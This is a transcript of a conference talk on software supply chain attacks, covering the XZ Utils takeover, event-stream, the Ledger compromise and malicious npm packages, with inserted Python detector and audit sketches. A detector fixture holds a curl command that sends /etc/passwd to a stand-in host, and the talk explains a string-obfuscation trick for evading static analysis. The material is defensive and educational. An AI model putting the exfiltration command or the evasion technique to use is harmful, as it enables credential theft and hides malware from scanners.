The Dark Side of Open Source

Feross Aboukhadijeh
53:41 min
Aug 27, 2024

Open source code makes up 90% of most codebases. How do you know if you can trust your open source dependencies? Software supply chain attacks have exploded over the past 12 months and they’re only accelerating in 2024 and beyond. We’ll dive into examples of recent supply chain attacks and what concrete steps you can take to protect your team from this emerging threat.

Feross Aboukhadijeh

Founder & CEO at Socket

Feross is founder and CEO at Socket, a developer-first security platform. Feross has worked in open source software for 10+ years writing some of the most-downloaded JavaScript packages. Feross is a lecturer at Stanford where he teaches CS 253 Web Security. Socket makes a developer-first security platform that prevents vulnerable and malicious open source dependencies from infiltrating your software supply chain. Thousands of organizations in every industry use Socket to safely discover, audit, and manage OSS at scale.

Transcript

Feross Aboukhadijeh 5:11 All right, thanks for having me here, Brian. It’s great to be here, and I think folks are in for a treat. This is a fun talk. We’re going to go through a bunch of cool stories of different nefarious things that have happened in open source, and hopefully developers can leave this talk with some ideas about how to protect themselves, and also with a little more understanding of the kind of things that go on in the wide world of all these different package managers and places where we share open source. So to get started, let me just introduce myself. I’m Feross. I started out in open source. I spent a long time in the JavaScript community, and I wrote some of the most popular packages in that world. The scale of npm is crazy, so very quickly you end up with a ton of downloads if you contribute in that community. The great part about that was I got a chance to witness firsthand the massive growth in the way that open source is used within companies. I remember a time when there was a debate about whether open source or proprietary software was better, and I’m happy to say that open source has definitively won that debate, and everybody uses it. I then moved into security and started getting interested in that, and taught a class on web security at Stanford. And now I’m working at Socket, where I’m helping to build this product that’s helping a ton of companies defend their apps from different types of software supply chain attacks, which, as we’re going to see in this talk, are only increasing. Cool. And so just a quick bit on what Socket does, so folks have the background: it’s a tool that helps protect your code from everyone else’s code. It’s a tool that helps developers and security teams ship faster and spend less time on security busywork.
And we not only fight vulnerabilities, but we also provide proactive protection from bad open source dependencies. And we’ve been doing really well. We’re a pretty new company, only a couple of years old, but already we have some amazing customers that you can see here on the screen, and we’re protecting 300,000 code repositories. So we’ve been able to help a lot of people, and I hope this only continues to grow. So with that, let’s jump into the talk. In the last five years, the way that we write software has undergone a massive shift. Today, it’s super common to see applications where over 90% of the code comes from open source dependencies, and that means that’s code that you or your fellow developers didn’t write. The average open source dependency has 79 transitive dependencies, and in a world where you’re building your application on thousands of dependencies, software security is not just about your code, it’s about every piece of code that you depend on. In this talk, we’re going to focus just on open source dependencies, but really your full software supply chain includes all the third-party code you’re using: the APIs, the cloud services, even the dependencies in your operating system. All of those parts and pieces make up the software that you ship to your users. And unfortunately, the open source ecosystem is under attack. I don’t mean to be hyperbolic here, but we have seen a pretty dramatic increase. Some estimates put it at a 700% increase in the past year, and we are seeing these attacks impact organizations of all types and sizes. So if you use open source in any way, and you almost certainly do, then you’re going to be affected. It’s not really a matter of if, but when.
And the reason I say that is that the packages we’re seeing get compromised are these really pervasive open source dependencies that pretty much everyone uses in one way or another. So we need to think ahead a little bit to understand what steps we can take now so that when a popular package that we use is compromised, we won’t be in massive trouble, right? That’s what this talk is about. Now, when we talk about software supply chain security, I know that can sometimes be super abstract, so I want to make this concrete for everyone and show you what a software supply chain attack looks like. This is a real example, something Socket detected. It’s not a very interesting attack, but it’s something we detected recently, so let’s take a look at it. Let me help you see what’s going on in this file. I’m going to highlight a couple of parts of the file. Does that help? If you look at these sections here, you can see that if a developer were to install this package, this malicious code would immediately run and it would exfiltrate, or steal, their environment variables, so things like the secrets, tokens, and keys that are in the environment variables, and send them to this attacker-controlled domain, which you can see is obfuscated there in the third line. So this is how a software supply chain attack directly leads to a breach. This attacker added this code into an open source package. If anyone installs and runs this package, they’re going to steal all the tokens, and that’s going to allow them to get access to further parts of the application. And I’ll mention a couple of examples of big supply chain attacks also, in case these jog your memory. There was this big one called the SolarWinds hack. This happened a few years ago.
It was a sophisticated attack that compromised a company called SolarWinds. The attackers added malicious code into SolarWinds software products, and they were then able to infiltrate the networks of thousands of SolarWinds customers, including U.S. government agencies and large corporations. And while the direct monetary damage is hard to quantify, the costs associated with all the investigation, the remediation, and the increased cybersecurity measures definitely ran into the billions of dollars. What’s interesting about this attack is that this picture here is very similar to how an attacker would compromise open source. You’re just replacing the supplier here with the open source maintainer, so the attacker can get code into the open source project, and then it will affect the downstream customers. And this is actually what we saw very recently with the XZ Utils backdoor. Probably most of you have heard about this. This was massive news a couple of months ago, but I’ll just give a summary here before we dig in so that everyone can get up to speed. What happened with XZ was that a group, likely backed by a state, infiltrated an open source data compression project called xz by gradually winning over its main contributor, Lasse Collin. Over several years, they introduced a sophisticated, though not perfectly flawless, backdoor aimed at compromising SSH servers. The attack exploited a dependency of SSH on systemd on Linux, which in turn relied on the compromised compression library.
So this basically created a multi-layered vulnerability. What fascinated everybody about this attack was how long it took, the duration of the plot, and the way they created multiple credible personas. They had just an insane amount of patience, so it suggested that this was a highly organized effort, probably from a state. The complexity and the way they executed this made a lot of folks in the community think that maybe it was the same team that was responsible for the SolarWinds breach, though I think information on this has evolved quite a bit since the story first broke. So what I wanted to do now is show you what this attack looked like. I think it’s a fascinating example of what it looks like when somebody tries to infiltrate an open source project, and we can see what we can learn from this. Let me start by mentioning that this is more of an old-school open source project. It’s been around for 15-plus years, I think. You have a maintainer that’s been tirelessly maintaining this project over a really long time, and they use a mailing list to discuss changes to the project. What you’re seeing here is the first email to the mailing list from this attacker named Jia Tan. You’ll notice they’re adding an .editorconfig file. This is a very innocent change. It doesn’t really do anything, but they’re just trying to, I guess, build trust with the maintainer and show that they can do some useful things. This email gets totally ignored by the maintainer.

A month later, there’s another email from the same contributor sending another innocent patch to the mailing list. This fixes a build problem with reproducible builds. They continue to send more patches along these lines, most of them getting totally ignored by the maintainer, because, again, this maintainer is pretty burned out and has been doing this for about 15 years. But then finally, in February 2022, so this is now two or three months later, the first commit from this malicious actor has finally been merged. It’s an innocent commit. It’s just adding a simple null check. The lesson from this, I think, is that the simpler the change, the simpler the fix, the easier it is for the maintainer to merge. So I think what the attacker learned here is that they should just fix a really, really simple bug with a two-line fix that the maintainer can easily evaluate, and then get that merged. Then what we saw was a couple of months go by and another persona shows up, Jigar Kumar. This person sends a few emails to the list and complains about Jia Tan’s patches not landing. You can see here, he says, “Patches spend years on this mailing list. There’s no reason to think anything is coming soon.” At this point, the maintainer, Lasse Collin, has already landed four of Jia Tan’s patches. But what’s going on is they’re trying to create pressure on the maintainer to maybe consider adding additional contributors. You can see Dennis, another fake persona, comes in here a month later and mentions this phrase that is the bane of all maintainers, which is, “Is this package still maintained?” That is also building up the pressure on the maintainer.
And I’ll just say that this is one of those things that, if you send it to a maintainer, is one of the worst things they can possibly receive from their community. I’ve experienced this myself on some of the projects I maintain, and it’s honestly super mean to send this to a maintainer, asking if their project is dead, because they’re probably feeling pretty overwhelmed and being pretty hard on themselves already. Then to get a message saying, hey, is this thing dead? It isn’t the nicest. And I think this problem has gotten a lot worse in the new model of open source that has taken off with npm and these newer ecosystems. Rather than having a single project, like Linux, that has dozens or hundreds of maintainers who all work on that single project, we have more of the latter model here, which is a single maintainer with tens or hundreds of projects. In this model, it’s very easy for the maintainer to get overburdened and to not really be able to handle the maintenance load of their packages. So what we see is the maintainer apologizes for the slowness, and they add this little message here that Jia Tan has helped off-list, meaning that they’re communicating over some type of chat system working on this, and he hints that Jia Tan might have a bigger role in the project in the future. He says, “It’s clear that my resources are too limited.” So you can start to see here that the maintainer is starting to come to the realization, due to the pressure from the different posters, that maybe they should consider adding other folks to the project. And then here we see another two messages from this Jigar character, sending a pressure email: “Over one month and no closer to being merged. Not a surprise.” You can sort of hear the negativity in that. Same thing with this next message, saying progress will not happen until there’s a new maintainer.
And then here you can see Lasse replying and saying that he’s having some mental health issues, and he’s again hinting that Jia Tan might be able to help in the future. And then finally, we have the first commit here merged with Jia Tan as the author. There was an earlier commit with him as the author, but the name wasn’t set correctly. And then finally, oh, sorry, I’m getting ahead of myself. Here, we still see more pressure being applied. Jigar is saying, you know, you’re choking your repo, why are you not changing maintainers? Dennis is also adding on another message: why not pass on maintainership? So they’re making it feel like there’s all this community pressure to pass on maintainership. Jigar, at the very end here, is even asking Jia why he can’t commit this directly himself. And then finally, we see here another three-month gap, and then Jia Tan finally posting the release summary for version 5.4.0. So this is kind of the first moment that the attacker has actually gotten commit rights to the repository. I’m not going to get into all the technical details of what happens from here, but essentially this permission allows Jia Tan to then land a set of patches that will eventually make their way into SSH and allow anyone who has the right key material to SSH into any server that’s running this version of SSH. This could have affected a significant, like double-digit, percentage of all SSH servers in the world. This would have been horrible.
But fortunately, some enterprising developers discovered this suspicious code and traced it back to some of the stuff that Jia Tan was doing, and the community was able to stop it before it was released, and only a few people who were running pre-release versions of their operating system were affected. But this is a crazy story, because you can just see the number of personas, the length of time, the patience, right? And what I want to draw your attention to is that there were months that went by between some of these messages. If these people are working for a state, which is currently the best theory we have here, since this level of persistence almost certainly points to a state attacker, my question is, what were they doing for the months between those messages? They were obviously trying to work their way into other open source projects, right? This was certainly not their only attempt. So I would suspect that there were probably 20 or 50 other similar email threads happening in other open source projects. And it just remains to be seen which of those we’ll learn about. It’s quite scary, honestly, to me, and I really just wonder, where have they actually succeeded? So it’s something we need to do better on as a community. I’ll mention one other incident that’s very similar to this one. What I think is so fascinating about this event-stream incident is this: XZ was a very recent one. We learned about it this year. event-stream, on the other hand, is something that happened back in 2018 in the JavaScript community, and it has a lot of similarities to the XZ incident.
And it was really an early preview of some of these attacks we were going to see over the coming five years, but honestly it was a lot simpler and a lot less sophisticated of an attack. But it’s illustrative, so I’m going to show you what that looks like. You’ll see it starts with a friendly feature suggestion from this developer, devinness, and then you can see the maintainer saying he doesn’t really use this module anymore, and he’s not really planning to maintain it. Then he eventually ends up getting an email from someone who says, hey, I’d love to take over this package. And Dominic just immediately gives access to the person who emails him. And I want to emphasize this is actually open source working as it should. You should really be inviting in new contributors. You should be encouraging people to join the project. It creates robustness, and so nothing about this really sets off that many alarm bells. It’s normal for people to want to help, and so it’s kind of hard to spot this. But let’s continue with the story. So here you see the part of the thread where folks have actually learned that the new maintainer added a backdoor into the package. You’ll see here Dominic’s reasoning for why he did it. He said: he emailed me and said he wanted to maintain it, so I gave it to him. I don’t get anything from maintaining this module, and I don’t even use it anymore, and haven’t for years. So you have a burned-out maintainer not really using the code anymore. It’s totally reasonable for them to give that to somebody else to take care of.

and, and so, yeah, you know this, this is, this is kind of how it happens. And then the way the community found this, this is the part that’s also, it’s super similar to xz. It’s, it’s was discovered by a total accident. You have a developer who just noticed the deprecation warning getting printed out in the in their console, and they traced it back to the code that the attacker added. So the attacker used the deprecated function basically and and then they they found out that, oh, there is this. This, this highlighted code here, was added to the bottom of one of the files. And you can see the attacker, you know, you know, they were making a bunch of good changes, positive changes, but then eventually they they added in this, this sneaky bit of minified code. And if you unminified here as the kind of this this commenter did, you can pretty. Clearly see what’s going on. So it’s, there’s a payload that’s encrypted on, you know, with this data variable. And the first thing it does is it just decrypts the payload, and then it, it evals, it to to basically run the code and and it, it uses, it uses a one of these environment variables from NPM as a decryption key. And so basically the key comes from kind of the project that’s that the code is being run in. And yeah, and so it just got so we just got lucky as a community that the function that they used was deprecated right after they released the attack, and the community kind of did this, this, this massive search of all of all NPM packages, and found that it was actually this package, copay, that was being that was being targeted. And unfortunately, this was an electron application and and this bad dependency got bundled into the electron app and shipped out to the users of the electron app. So the malware exfiltrated the private keys from the from the crypto wallets of the users, and it, it would, it would, it would, it would, it would sneakily steal their crypto. 
And I would say it was a very successful attack. So the moral of the story here is that maintainers, in the course of doing their normal work of maintaining their packages, will share access with people. And given enough time, given burned-out maintainers, and given, honestly, enough persistence, it’s possible for the bad guys to get into any open source project. That’s just a fact. With enough time, enough patience, and enough willingness to do good contributions over the course of months or years, they will eventually be able to build up trust with really anyone and get into the packages they want to get into. And so given that developers can’t read every line of code in their dependencies, we need to start thinking about ways that we as a community can do better here. Unfortunately, we’re not doing very well right now. It takes over 200 days to detect these malicious packages, on average. This is according to some research from the USENIX Security conference, and 20% of the malicious packages are actually caught only after 400 days. So it’s really bad. The other problem here is that even when stuff is found, oftentimes it isn’t added to the National Vulnerability Database, and so there’s no reporting system. Obviously, the really big attacks tend to get reported and discussed a lot, but the vast majority of the attacks that are happening never even get documented or cataloged in a standard location, so that we as developers can scan our code and our packages to see if we’re using any of those bad packages. So at Socket, we’ve built a system where we can actually scan code in all the ecosystems today.
That’s npm, Go, Python, and Java, and we’re adding Ruby and Rust in the coming months. Whenever we find a malicious package, we report it and get it taken down to protect the community. We’re finding over 100 of these per week right now, so it’s quite a lot. So we’re doing our part, and then we’re providing the data that we collect to anyone who signs up for Socket. We have a really generous free plan, and you can just install it for free and get protected today. So, yeah, that’s kind of a summary of some of the problem. I think one other attack that’s worth going into a bit, that has some very interesting lessons, especially for anyone who’s working on a web app, is the Ledger attack. This happened back in December, and there’s a whole bunch of really cool lessons that came out of it, I think, for folks that are using npm packages, that I’d like to dig into here. Then we’ll see how much time we have to go into some of the other stuff I had prepped. But yeah, what happened here was hackers compromised the code used in an SDK published by Ledger. A hacker got access to the npm account for the Ledger SDK, and then they put code in there that would reroute funds to the attacker’s wallet. What’s so interesting about it is that the users of the library in question were doing everything right, in some sense. They just installed the package that they were recommended to install by Ledger. They initialized it with this await loadConnectKit() function call. What it turns out, though, is that this was not initializing code that was part of the npm package. What this was actually doing was remotely loading code off of a CDN and then injecting that into the web page with a script tag.
And they did this in order to, as they say in their README here, allow them to push out updates to the library without having every one of their users need to update their npm package. This would allow them to release builds faster. You can see the code they use to do this is here, and I’ll highlight a couple of the parts that are the most salient. You can see they’re injecting a script tag into the page. Now, the problem with this is it completely bypasses the lock file and allows anyone who’s able to get code onto the CDN to effectively change the code running on the website of everyone who’s using this library, all at once. When this happened, the Ledger security team was able to deploy a fix and update the code on the CDN, but the malicious file ended up remaining live for about five hours while the CDN cache was getting invalidated. So what we learned from this is a few things. Authors of packages should not be hot-linking to JavaScript CDNs from within npm packages, because this is going to completely bypass the lock file and take away control from the user of the open source package. Related to that, it’s really not a good practice to link to HTTP, Git, or GitHub dependencies within a package.json. This is effectively also bypassing the lock file by allowing the code that’s installed to be changed without a new version of a package being published. They also should have minimized who had access to npm publish. They had a former employee who had left the company but still had access, and they forgot to remove it when that person left. So we need to audit our npm access regularly, and ideally have some type of rigorous, checklist-based process for offboarding when an employee leaves the company.
And then finally, if we can, we should be using GitHub Actions workflows to trigger publishes so that no individual developer actually needs access to npm. On the user side, it’s important to not use packages that remotely load code and bypass your lock file, to the extent you can identify this. Socket actually does have some alerts that we’ll be able to send you for packages that do those things, so if you’re using Socket, you will get warned if any of your dependencies are doing this. You should also read the code in your dependencies, as much as you can afford the time to do that. It’s really a good idea and a good investment. Or you can use a security tool that detects these types of risks, and obviously Socket would be one of those. And then more general advice is, to the extent that you can, you should try to use fewer dependencies. You should pin your dependencies, never use the wildcard operator, and avoid mutable package references. Again, those are the HTTP and Git URLs, as well as any type of @latest, where you point to a tag, because those can be updated at any time by the maintainer without your knowledge. If you do these things, I think you’ll be in much better shape to avoid what happened to Ledger.
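As a rough illustration of the pinning advice above (not something shown in the talk), the following Python sketch walks the dependency sections of a package.json and flags wildcards, remote URL or Git references, mutable tags such as latest, and version ranges that are not exact pins. The function names, the regular expressions, and the package names in the sample manifest are all hypothetical, and the classification is deliberately simplistic: it does not understand every specifier npm accepts, such as npm: aliases or file: paths.

```python
import json
import re
from typing import Optional

# Simplified patterns (assumptions for illustration, not npm's full grammar).
EXACT = re.compile(r"^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?$")
REMOTE = re.compile(r"^(https?://|git://|git\+|github:|[\w.-]+/[\w.-]+)")
TAG = re.compile(r"^[A-Za-z][\w.-]*$")


def classify(spec: str) -> Optional[str]:
    """Return a short description of the risk, or None for an exact pin."""
    spec = spec.strip()
    if spec in ("", "*", "x", "X"):
        return "wildcard"
    if REMOTE.match(spec):
        return "remote URL or git reference"
    if TAG.match(spec):
        return "mutable tag"
    if not EXACT.match(spec):
        return "version range, not an exact pin"
    return None


def audit_manifest(manifest: dict) -> dict:
    """Map each risky dependency name to the reason it was flagged."""
    findings = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in manifest.get(section, {}).items():
            issue = classify(spec)
            if issue:
                findings[name] = issue
    return findings


# Hypothetical manifest; none of these names refer to real packages.
SAMPLE = json.loads("""
{
  "dependencies": {
    "pinned-lib": "1.3.0",
    "some-sdk": "*",
    "other-lib": "^2.1.0",
    "forked-lib": "github:example-user/forked-lib",
    "beta-tool": "latest"
  }
}
""")

if __name__ == "__main__":
    for name, issue in audit_manifest(SAMPLE).items():
        print(f"{name}: {issue}")
```

Exact pins in package.json only cover direct dependencies; the lock file is what fixes the versions of transitive ones, so a check like this complements a committed lock file rather than replacing it.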

And yeah, when we think about security tooling and how it works for developers, today it’s a little bit too hard to do the right thing. Some of the things in here just require manual work, and they’re a little bit too hard for everyone to do consistently. But I think to the extent that we can, we should try our best to do these things, because we’re going to be much safer. A lot of the legacy tools in this space, such as Snyk and Dependabot, don’t do a very good job of making it easy for developers to do the right thing. In the case of this Ledger attack, they were reporting that the package was safe for 24 hours after the package was actually compromised. This is because the way they report their security findings is based on a very reactive approach of waiting for an official vulnerability, or CVE, to get issued. So we just need to do better as a community. The other big problem is that we’re drowning in a flood of alerts. Anyone who’s used npm audit knows that every time you install a package, you pretty much get this warning that you have hundreds of vulnerabilities, and it’s flooded developers to the point where they just tune these out. There was a very famous post about this a few years ago from Dan Abramov, of React fame, where he called npm audit a stain on the entire npm ecosystem, and he said the way that it works is totally broken. And I would agree with that. I think the problem with npm audit, and with vulnerability scanners in general, is that they’re sending way too many alerts to developers, to the point where we can’t even use the information they’re sending us. We’re getting false positives.
We’re getting warnings about vulnerabilities in code that’s never even used, never even run. We’re getting warnings for developer dependencies, which are never run in production. The severities are all inflated. Everything’s a critical or a high, even though it’s more likely to be a medium or low, if we’re being honest. And at the same time, these tools don’t even alert about the things that we care about, like all the attacks I’ve been talking about this whole talk: supply chain attacks, malicious dependencies, typosquats, hijacked packages, backdoored dependencies, all this type of stuff. They don’t warn about any of that. So we’re really in this worst-of-both-worlds situation right now. But to try to inject a little bit of positivity in here, I would say one of the things that’s helping us right now, and it’s really quite a promising change, is that we’re seeing that LLMs, large language models, are able to help us get a handle on this problem. I mentioned that the problem is developers can’t read every line of code of their dependencies. There’s not enough time for that. There’s too much code, there are too many dependencies. But an LLM can read every line of code of your dependencies. So at Socket, we’ve been using LLMs for over a year now to do this, to try to help people get a handle on the risks in their dependencies. This type of generative AI approach enables us to identify threats that evade traditional analysis approaches, and to take code like what you see on the left and turn it into a verdict like you see on the right. This is actually the explanation that our system generated for the Ledger attack that I mentioned earlier, where we were able to detect the obfuscated code that was added into the package and warn our users.
So we’re starting to have good tools as defenders to finally automate some of this, take away the toil, and help developers do the right thing without having to do a ton of work. I’m excited and encouraged by that development, and I’m really optimistic about how LLMs can help us here. Cool. So I have a couple of minutes here, and I think I’m going to use the last little bit of time I have to show you a sampling of some of the recent malware that we found, because I think some of it’s pretty cool and pretty interesting. I went through and grabbed a few examples of malicious packages published to different ecosystems in the past week, mostly npm, but I think there’s some Python in there as well, just to show you what is going on out there on these package managers. Hopefully it’s entertaining and interesting. So here’s a package we found that runs a curl command and basically sends your /etc/passwd file, which is your system password file, to this ngrok HTTP URL. So this is just exfiltrating this important system file. The LLM was able to identify it as malware and report that there’s data exfiltration of sensitive information. This is a very simple example, but it’s good to see that it works in those cases. Unfortunately, it’s usually not that simple. What we more often see published to these registries is code that looks like this: code that’s been intentionally obfuscated, designed to be unreadable and, as much as possible, to evade any type of static analysis or code analysis tools. But fortunately, an LLM, given that it operates on language and not on the AST of the code, is able to pick up on a few keywords in this file and get a sense that something nefarious might be going on here. If you scroll down in the file, it also identifies some other things, such as the fact that Discord is being contacted to download an exe file. We see child_process, which is used to run files. We see updater.exe. There’s enough in here, plus the fact that it’s obfuscated, that our Socket AI system was able to identify this as arbitrary code execution, downloading from untrusted sources, and a significant security risk. So again, pretty exciting to see that we can actually use AI to help us out here as developers.
Now I want to show an example that I thought was quite entertaining. This is another example of really deep obfuscation that an attacker attempted. In this package, you’ll see that they’re using, on this line here, a little bit of obfuscation to hide what’s going on. I want to draw your attention to the type function. The type function here is actually returning a string that’s going to be used to make an HTTP request. But they wanted to hide from a specific analysis tool that looks for the string http.request, http.get, or http.post, so they used this complicated obfuscation technique. If I go to the type function, we can try to figure out what this code is doing. I’ll draw your attention to the bottom of the function: it’s passing 0, 1, and 2 into the prop getter function, and then the prop getter function is calling the prop value function with the number in question, which is prop, but it’s also passing in prop getter, which is the function we’re running inside of. So it’s passing a reference to the function itself into prop value, which is sort of weird. Then prop value takes the function that’s passed in and turns it into a string.
So now we’re looking at a function as a string. It splits on the newlines and then filters down to just the lines that start with slash-slash, which means it’s actually targeting the comments inside the function. It’s looking at these comments here, “West question in Ireland,” and trimming those down to basically chop out the words “West question in Ireland,” which is kind of odd. Then it’s using the indexes down here to chop those strings down further, selecting specific substrings within them. So it’s selecting “st,” “que,” and “re,” and then it reverses those and joins them together. And you’ll notice that, reversed and joined, they spell the word “request.” So all this code just to create the string “request”; that’s what gets returned here. Effectively, this line turns into http.request, and that actually bypasses a bunch of static analysis that’s looking for http.request.
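The reconstruction steps described above can be sketched in a few lines. This is a minimal Python illustration, not the attacker's actual JavaScript: the function source is supplied as a literal string rather than obtained by converting a live function to a string, and the comment lines, the slice indexes, and the helper names `comment_words` and `rebuild_hidden_string` are all assumptions chosen to match the walkthrough.

```python
# Hypothetical stand-in for the attacker's function after it has been turned
# into a string. The comment text is an assumption, not the real package.
FUNCTION_SOURCE = """function propGetter(prop) {
  // West
  // question
  // Ireland
  return propValue(prop, propGetter);
}"""

# Hypothetical (start, end) slice for each comment word.
SLICES = [(2, 4), (0, 3), (1, 3)]


def comment_words(source: str) -> list[str]:
    """Return the text of every line that starts with '//'."""
    words = []
    for line in source.split("\n"):
        stripped = line.strip()
        if stripped.startswith("//"):
            words.append(stripped[2:].strip())
    return words


def rebuild_hidden_string(source: str) -> str:
    """Slice each comment word, reverse the fragment order, and join."""
    fragments = [
        word[start:end]
        for word, (start, end) in zip(comment_words(source), SLICES)
    ]
    return "".join(reversed(fragments))


hidden = rebuild_hidden_string(FUNCTION_SOURCE)
print(hidden)
```

The point of the sketch is that the sensitive word never appears as a literal anywhere in the code, so a scanner that searches for that literal finds nothing, while anything that actually follows the data flow recovers it.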

But fortunately, our LLM is not fooled by that. The gen AI systems are able to look at that code and say, hey, that actually looks like it’s sending environment variables, it’s obfuscating the nature of the prop value function, and there’s some malicious data exfiltration. So it’s pretty cool stuff. I really think AI is going to help us out a lot here, and this is the path forward for starting to detect and stop these kinds of attacks. I think this is really just the beginning of what we’re going to be able to do with this technology as defenders and as developers. Excuse me, I’m sorry, I’m getting some kind of a cough right now, and I’m trying my best not to cough here. But yeah, that’s pretty much it for my talk. The lesson here for us as defenders is that open source risk is a complicated and multifaceted issue. There are a lot of factors that go into whether an open source package is safe and good to use. It’s a lot more than just the vulnerability stuff we’ve been seeing from a lot of the tooling we’re familiar with. There’s so much more that you care about as a developer. Does the package have good quality? Is it maintained? Is the author trustworthy? What does the code actually do at runtime? Is the license safe? We want to ask ourselves these questions when we look at open source and decide whether we want to use those packages or not. As much as possible, we should zoom out, try to have a broad view of open source risk, and think about as many of these factors as we can. So with that, I’ll say thank you, and I’ll also mention: feel free to get in touch if you ever want to reach out. I love talking about this stuff.
So if you have any questions for me and you want to talk, I’m happy to chat with anyone. You can contact me; email is probably the best. Otherwise, I think we’ll have a few minutes for questions here. So thank you for your time, everybody.

Brian Rinaldi 46:16 Yeah, that was awesome. That last one was really interesting, because I think at a certain point most developers, if they were tasked with verifying this, would have gotten lost in the maze they intentionally created to obfuscate that request, and overlooked it. But yeah, that was pretty impressive.

Feross Aboukhadijeh 46:44 Yeah, I agree. I was shocked at some of the things that the LLMs have been able to identify. A related one that was also relatively shocking was base64-encoded strings. You would think, how could it decode base64? But I think there’s been enough training data where it’s looking at base64-encoded strings that it actually has kind of, maybe... I haven’t verified this, so don’t quote me on it, but I’ve seen instances where it looks at a base64 string and just says, oh yeah, it’s running this shell command. They actually tried using base64 to hide it, but the LLM just looked at that and was like, oh yeah, I can decode that and figure out what it’s doing.
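For comparison, the deterministic version of that check is easy to sketch: find long base64-looking runs in a source file, try to decode them, and flag anything that decodes to text resembling a shell command. This is a minimal Python sketch under stated assumptions, not how Socket's system works: the length threshold, the `SHELL_HINTS` list, the function names, and the sample payload pointing at `example.invalid` are all hypothetical.

```python
import base64
import binascii
import re

# Runs of 16 or more base64 characters with optional padding. The length
# threshold is an arbitrary assumption meant to skip short identifiers.
BASE64_CANDIDATE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Hypothetical hints that decoded text is a shell command; not exhaustive.
SHELL_HINTS = ("curl ", "wget ", "bash ", "sh -c", "/etc/passwd")


def decode_candidates(source: str) -> list[str]:
    """Decode every base64-looking run that yields printable UTF-8 text."""
    decoded = []
    for candidate in BASE64_CANDIDATE.findall(source):
        try:
            text = base64.b64decode(candidate, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not text once decoded
        if text.isprintable():
            decoded.append(text)
    return decoded


def suspicious_payloads(source: str) -> list[str]:
    """Keep only decoded strings that contain a shell-command hint."""
    return [
        text for text in decode_candidates(source)
        if any(hint in text for hint in SHELL_HINTS)
    ]


# Build a sample at runtime so the encoded form is guaranteed to be correct.
sample_command = "curl http://example.invalid/collect -d @/etc/passwd"
sample_payload = base64.b64encode(sample_command.encode("utf-8")).decode("ascii")
sample_source = f'const cmd = atob("{sample_payload}"); run(cmd);'

print(suspicious_payloads(sample_source))
```

A fixed-pattern check like this only catches payloads that are encoded once and stored in one piece; splitting the string or layering encodings defeats it, which is where a model that reads the surrounding code has an advantage.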

Brian Rinaldi 47:26 Yeah. I think this is one of those things where AI can actually be really helpful, because it’s doing a kind of repetitive task that’s difficult, as you said. I mean, the number of lines of code in dependencies, especially... I’m mostly a JavaScript developer, so maybe it’s a matter of perspective, but I feel like the JavaScript community is just overloaded with dependencies at this point. I mean, yeah, you could go over it, but it could be somebody’s full-time job just digging through all the dependencies all the time, and there’s always some new dependency added, et cetera. So it’s a really tough task to ask of somebody, but a machine can do it for you better. And I mean,

Feross Aboukhadijeh 48:20 to be clear, I don’t think the machine today is necessarily doing as good a job as a human would. But if the alternative is to do nothing, and to just install random code from random people on the internet, which is one way of describing open source, and use it without any type of vetting, I think having some kind of automation that can do a pretty good job is a really good starting point. And especially since there hasn’t really been much in the way of scanning for these types of issues in the past, there’s actually a lot of low-hanging fruit, where the bad guys haven’t had to try very hard to hide their tracks, because no one has really been looking. So a lot of the attacks are easy to catch, in the sense that if a human were to look at the code, like any of the code I showed you up there, if you were to go to node_modules in your editor and open up one of those files and you saw that kind of code, you’d be very mystified. Why is this code just an obfuscated block of all these weird functions? You could tell right away, as a human, that something is off. And so the LLM is able to do that pretty well and help out.
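The low-hanging fruit mentioned here can be illustrated with a very small indicator scan over a dependency file's text. This is a rough Python sketch, not a real detection product: the indicator labels and regular expressions in `INDICATORS` are hypothetical, loosely based on the signals named in the talk (child_process, downloading an exe, environment variables, obfuscated code), and the sample string is invented.

```python
import re

# Hypothetical indicators; the labels and patterns are illustrative only.
INDICATORS = {
    "spawns a process": re.compile(r"child_process"),
    "downloads an executable": re.compile(r"https?://\S+\.exe\b"),
    "reads environment variables": re.compile(r"process\.env"),
    "hex-style obfuscated identifiers": re.compile(r"\b_0x[0-9a-f]{4,}\b"),
}


def scan_source(source: str) -> list[str]:
    """Return the label of every indicator found in the source text."""
    return [
        label for label, pattern in INDICATORS.items()
        if pattern.search(source)
    ]


# Invented sample resembling the kind of file described in the talk.
sample = (
    'const _0x3fa1 = require("child_process"); '
    '_0x3fa1.exec("https://cdn.example.invalid/updater.exe");'
)

print(scan_source(sample))
print(scan_source("module.exports = (a, b) => a + b;"))
```

Each of these signals also appears in plenty of legitimate packages, so a scan like this is only useful for deciding which files deserve a closer look, by a human or by a model.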

Brian Rinaldi 49:38 Yeah, no. I mean, you brought this up in your last slide. I think it was four or five years ago, and not much has changed since then, but I remember regularly giving a talk on license issues specifically, because most developers I talked to didn’t seem to even know what licenses they were using. That’s obviously a risk too, a different kind of risk: when you’re working at a company and you pull in a license you aren’t aware of, that can put you at risk of litigation instead. But even getting folks to run a simple license check prior to installing something was difficult. So I can imagine getting them to go through the dependencies looking for stuff is also incredibly difficult.
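A simple license check of the kind mentioned here can be sketched as a comparison of each dependency's declared license against an allowlist. This Python sketch works on already-parsed manifest data; the `license` key mirrors the field npm packages declare in package.json, while the allowlist contents, the function name, and the sample package names are assumptions for illustration. It does not handle compound SPDX expressions such as "(MIT OR Apache-2.0)".

```python
# Hypothetical allowlist; a real policy would come from the company's legal team.
ALLOWED_LICENSES = {"MIT", "ISC", "BSD-2-Clause", "BSD-3-Clause", "Apache-2.0"}


def license_problems(manifests: list[dict]) -> list[str]:
    """Report dependencies with a missing or non-allowlisted license."""
    problems = []
    for manifest in manifests:
        name = manifest.get("name", "<unnamed>")
        license_id = manifest.get("license")
        if not isinstance(license_id, str) or not license_id:
            problems.append(f"{name}: no license declared")
        elif license_id not in ALLOWED_LICENSES:
            problems.append(f"{name}: {license_id} is not on the allowlist")
    return problems


# Invented manifests standing in for parsed package.json files.
sample_manifests = [
    {"name": "left-helper", "license": "MIT"},
    {"name": "copyleft-lib", "license": "GPL-3.0-only"},
    {"name": "mystery-pkg"},
]

for problem in license_problems(sample_manifests):
    print(problem)
```

Running a check like this before install, rather than after, is the part that was described as hard to get people to do.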

Feross Aboukhadijeh 50:33 Yeah.

